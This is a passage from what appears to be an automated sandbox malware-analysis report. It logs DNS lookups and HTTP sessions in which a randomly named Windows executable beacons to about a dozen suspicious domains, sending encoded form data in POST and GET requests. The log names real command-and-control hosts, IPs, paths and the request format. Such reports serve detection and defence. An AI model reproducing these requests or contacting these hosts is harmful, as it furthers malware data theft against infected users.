                                                                                                            Oct 7, 2024 15:55:01.218092918 CEST53612771.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:55:27.619556904 CEST5351153192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:55:27.667025089 CEST53535111.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:55:40.994286060 CEST5561153192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:55:41.113018036 CEST53556111.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:55:55.385942936 CEST5015653192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:55:55.404248953 CEST53501561.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:56:11.838162899 CEST6174353192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:56:11.849656105 CEST53617431.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:56:25.403147936 CEST5458753192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:56:25.702547073 CEST53545871.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:56:39.043411016 CEST6249953192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:56:39.561825037 CEST53624991.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:56:53.401046991 CEST5297953192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:56:53.440731049 CEST53529791.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:57:07.198620081 CEST5903453192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:57:07.221554041 CEST53590341.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:57:20.529004097 CEST5177453192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:57:20.822094917 CEST53517741.1.1.1192.168.2.9
                                                                                                            Oct 7, 2024 15:57:34.995953083 CEST4954553192.168.2.91.1.1.1
                                                                                                            Oct 7, 2024 15:57:35.111866951 CEST53495451.1.1.1192.168.2.9

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 7, 2024 15:55:01.178348064 CEST192.168.2.91.1.1.10x43e0Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:27.619556904 CEST192.168.2.91.1.1.10x9863Standard query (0)www.kovallo.cloudA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:40.994286060 CEST192.168.2.91.1.1.10x8aa5Standard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:55.385942936 CEST192.168.2.91.1.1.10xa231Standard query (0)www.tracy.clubA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:11.838162899 CEST192.168.2.91.1.1.10x8ceStandard query (0)www.sterkus.xyzA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:25.403147936 CEST192.168.2.91.1.1.10xe574Standard query (0)www.syncnodex.netA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:39.043411016 CEST192.168.2.91.1.1.10x6c00Standard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:53.401046991 CEST192.168.2.91.1.1.10x5b2Standard query (0)www.warriorsyndrome.netA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:07.198620081 CEST192.168.2.91.1.1.10xd34eStandard query (0)www.ks1x7i.vipA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:20.529004097 CEST192.168.2.91.1.1.10x3cbfStandard query (0)www.pakmartcentral.shopA (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:34.995953083 CEST192.168.2.91.1.1.10xae03Standard query (0)www.les-massage.onlineA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 7, 2024 15:54:29.700155973 CEST1.1.1.1192.168.2.90xbba5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:54:29.700155973 CEST1.1.1.1192.168.2.90xbba5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:01.218092918 CEST1.1.1.1192.168.2.90x43e0No error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:27.667025089 CEST1.1.1.1192.168.2.90x9863No error (0)www.kovallo.cloudkovallo.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:27.667025089 CEST1.1.1.1192.168.2.90x9863No error (0)kovallo.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:41.113018036 CEST1.1.1.1192.168.2.90x8aa5No error (0)www.sppsuperplast.onlinesppsuperplast.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:41.113018036 CEST1.1.1.1192.168.2.90x8aa5No error (0)sppsuperplast.online94.73.146.114A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:55.404248953 CEST1.1.1.1192.168.2.90xa231No error (0)www.tracy.clubtracy.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:55.404248953 CEST1.1.1.1192.168.2.90xa231No error (0)tracy.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:55:55.404248953 CEST1.1.1.1192.168.2.90xa231No error (0)tracy.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:11.849656105 CEST1.1.1.1192.168.2.90x8ceNo error (0)www.sterkus.xyz209.74.95.29A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:25.702547073 CEST1.1.1.1192.168.2.90xe574No error (0)www.syncnodex.net15.197.172.60A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:39.561825037 CEST1.1.1.1192.168.2.90x6c00No error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:39.561825037 CEST1.1.1.1192.168.2.90x6c00No error (0)galaxyslot88rtp.lat46.17.172.49A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:53.440731049 CEST1.1.1.1192.168.2.90x5b2No error (0)www.warriorsyndrome.netwarriorsyndrome.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:53.440731049 CEST1.1.1.1192.168.2.90x5b2No error (0)warriorsyndrome.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:56:53.440731049 CEST1.1.1.1192.168.2.90x5b2No error (0)warriorsyndrome.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:07.221554041 CEST1.1.1.1192.168.2.90xd34eNo error (0)www.ks1x7i.vipks1x7i.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:07.221554041 CEST1.1.1.1192.168.2.90xd34eNo error (0)ks1x7i.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:07.221554041 CEST1.1.1.1192.168.2.90xd34eNo error (0)ks1x7i.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:20.822094917 CEST1.1.1.1192.168.2.90x3cbfNo error (0)www.pakmartcentral.shoppakmartcentral.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:20.822094917 CEST1.1.1.1192.168.2.90x3cbfNo error (0)pakmartcentral.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 15:57:35.111866951 CEST1.1.1.1192.168.2.90xae03No error (0)www.les-massage.online194.58.112.174A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.moritynomxd.xyz
                                                                                                            • www.kovallo.cloud
                                                                                                            • www.sppsuperplast.online
                                                                                                            • www.tracy.club
                                                                                                            • www.sterkus.xyz
                                                                                                            • www.syncnodex.net
                                                                                                            • www.galaxyslot88rtp.lat
                                                                                                            • www.warriorsyndrome.net
                                                                                                            • www.ks1x7i.vip
                                                                                                            • www.pakmartcentral.shop
                                                                                                            • www.les-massage.online

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.949898172.81.61.224806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:01.241875887 CEST415OUTGET /v5tr/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1tiXGxnpWKIlAMdpeetvztbm0D0P/FQ== HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.moritynomxd.xyz
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.94997681.2.196.19806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:27.685478926 CEST671OUTPOST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 41 46 70 68 54 2f 68 49 43 4c 4c 69 50 51 41 49 38 34 6b 5a 46 64 73 6c 71 53 79 30
                                                                                                            Data Ascii: EjLdUJJ=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIAFphT/hICLLiPQAI84kZFdslqSy0
                                                                                                            Oct 7, 2024 15:55:28.483776093 CEST355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.94997781.2.196.19806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:30.245855093 CEST695OUTPOST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 5a 2f 7a 56 37 59 7a 4f 57 72 38 6b 6a 7a 73 6e 41 62 63 64 51 4d 50 30 4d 38 49 68 61 49 4d 45 6a 35 66 43 46 59 5a 6c 67 39 46 65 7a 6f 42 58 4a 48 6a 47 46 4e 33 47 64 67 7a 34 57 34 6d 43 72 32 6e 2b 4a 53 76 54 47 31 76 33 52 52 53 50 2f 4b 70 44 76 2f 45 2f 52 6a 79 74 71 7a 49 70 79 31 4b 79 42 6d 7a 44 63 31 55 6f 39 64 65 6b 48 67 71 55 7a 50 4d 59 58 56 2b 52 2b 73 73 53 34 54 53 49 78 67 57 74 4b 74 43 51 4b 73 43 74 31 37 63 69 44 45 4a 38 48 57 55 70 4e 4d 5a 6f 66 38 4c 36 45 48 4b 4a 77 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993Z/zV7YzOWr8kjzsnAbcdQMP0M8IhaIMEj5fCFYZlg9FezoBXJHjGFN3Gdgz4W4mCr2n+JSvTG1v3RRSP/KpDv/E/RjytqzIpy1KyBmzDc1Uo9dekHgqUzPMYXV+R+ssS4TSIxgWtKtCQKsCt17ciDEJ8HWUpNMZof8L6EHKJw==
                                                                                                            Oct 7, 2024 15:55:30.909902096 CEST355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.94997881.2.196.19806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:32.822316885 CEST1708OUTPOST /kmgk/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.kovallo.cloud
                                                                                                            Origin: http://www.kovallo.cloud
                                                                                                            Referer: http://www.kovallo.cloud/kmgk/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 59 48 7a 56 4f 4d 7a 66 46 7a 38 6c 6a 7a 73 35 51 62 52 64 51 4d 65 30 50 4d 4d 68 61 45 32 45 68 78 66 44 6e 51 5a 30 46 42 46 51 7a 6f 42 49 35 47 6b 5a 56 4e 69 47 64 78 36 34 57 6f 6d 43 72 32 6e 2b 50 2b 76 44 6e 31 76 73 52 52 56 5a 76 4b 6c 4a 50 2b 62 2f 52 37 4d 74 71 6d 31 71 43 56 4b 78 6c 43 7a 42 75 74 55 67 39 64 59 6e 48 67 49 55 7a 54 44 59 58 4a 63 52 2b 5a 35 53 34 62 53 4e 51 49 42 2b 70 5a 2f 43 35 6f 7a 70 56 57 31 6a 46 6f 54 79 32 54 50 77 64 52 35 35 2b 34 56 2b 6e 71 44 4b 47 75 43 75 43 70 54 69 67 56 76 62 39 76 32 46 65 50 35 6c 6f 5a 65 39 49 61 44 33 50 4f 48 77 6d 4d 51 2f 37 30 71 6f 55 63 4b 53 47 53 4c 42 2b 43 30 32 2f 6e 6e 49 51 34 7a 35 77 4e 44 33 4c 69 49 2f 72 6f 35 64 53 2b 61 6b 47 47 44 44 4a 53 65 54 75 57 74 49 59 54 45 34 63 6e 33 72 30 44 79 69 45 34 65 63 32 4b 77 57 63 74 72 58 42 66 37 6a 30 39 64 2b 38 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993YHzVOMzfFz8ljzs5QbRdQMe0PMMhaE2EhxfDnQZ0FBFQzoBI5GkZVNiGdx64WomCr2n+P+vDn1vsRRVZvKlJP+b/R7Mtqm1qCVKxlCzButUg9dYnHgIUzTDYXJcR+Z5S4bSNQIB+pZ/C5ozpVW1jFoTy2TPwdR55+4V+nqDKGuCuCpTigVvb9v2FeP5loZe9IaD3POHwmMQ/70qoUcKSGSLB+C02/nnIQ4z5wND3LiI/ro5dS+akGGDDJSeTuWtIYTE4cn3r0DyiE4ec2KwWctrXBf7j09d+8i7tfSeWLNQqX50oCDZWgl1UcgUdtVwRG8hbNc0akvIG6iZljDxEdzsMv052NpwKGSUoTHeHP0X10svpneqoeK0yfSBx2FgugkgM/vOptBnQTWYTTrajXFpX6dWjBoPE0XY7CE87ebRi3E5by3+EfOci1QaGWCW08bPgVt3CTrcW9CTvvA1t+31+5Re+nIuTv7EU+58QMtmsR3Cl0oGJarE+hoEM+EZW4PdXkVdkgm883yfvd1n3GcJvnrAGwzA9trr3oWYDC5YBk8EroG6dq5yaO968Vja9IJ6yWbHOGF7JxYq4E/NBHqvX+3QCN9giWTOJjuBjsg3Ouga8BrgT+9r4OsN7Ngb+TfgNKbo5P0vHP2gtjeb74EimgL2Ys8MImStLxPMJc4HF+ucFpL10+NRKTiFsPVmmE7F/C1Aq+8+ZCyfbA4aPKBC1Aji/T2AXuEmCqO/FMH2xFKauXvvwlPYgLkYLniEtDuM28fCM0J28wOVt0pMQKQdzTTzvK9WH2fR+tSiFdbvw6/ESMk0P6nRAc2QzCh4wQ/kmXKUcQ7jQFTE7PWYFSc7uP02M0X7KaKyLW7ePP76BcIyfvy+g9bo/s+8m4aN2OCYu8c47JYnVaarweToJRQsfVHyoxohUyE3+5unsRkox5+d92XOeNZHNQatd8XPwvxy [TRUNCATED]
                                                                                                            Oct 7, 2024 15:55:33.441025019 CEST355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.94997981.2.196.19806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:35.364209890 CEST413OUTGET /kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.kovallo.cloud
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:55:35.985527992 CEST691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:55:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.94998094.73.146.114806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:41.131969929 CEST692OUTPOST /becc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sppsuperplast.online
                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                            Referer: http://www.sppsuperplast.online/becc/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 42 7a 34 30 55 47 37 53 41 4f 6b 4b 69 4c 78 34 34 36 31 61 4e 71 36 64 6a 62 5a 2b 46 4b 4b 58 57 6e 44 43 4e 6d 46 76 52 63 4d 2b 37 72 50 78 67 51 42 47 48 34 78 58 76 46 33 75 2b 37 2b 33 45 61 55 6b 78 4e 53 49 75 2b 74 6b 69 58 32 4e 4a 64 78 57 76 79 69 72 55 39 45 6e 51 44 53 4e 72 36 47 59 43 45 6d 42 62 47 4f 66 78 4c 4c 45 30 43 39 68 38 44 59 52 65 65 33 68 73 51 39 6c 4a 41 7a 53 77 45 30 4f 68 34 71 5a 38 46 41 45 58 55 46 7a 4a 76 4e 36 67 47 38 34 45 75 46 64 30 4b 44 46 57 6b 57 6c 38 51 74 53 31 51 5a 39
                                                                                                            Data Ascii: EjLdUJJ=AOqAmCRO8x5pBz40UG7SAOkKiLx4461aNq6djbZ+FKKXWnDCNmFvRcM+7rPxgQBGH4xXvF3u+7+3EaUkxNSIu+tkiX2NJdxWvyirU9EnQDSNr6GYCEmBbGOfxLLE0C9h8DYRee3hsQ9lJAzSwE0Oh4qZ8FAEXUFzJvN6gG84EuFd0KDFWkWl8QtS1QZ9


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.94998194.73.146.114806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:55:43.917706013 CEST716OUTPOST /becc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sppsuperplast.online
                                                                                                            Origin: http://www.sppsuperplast.online
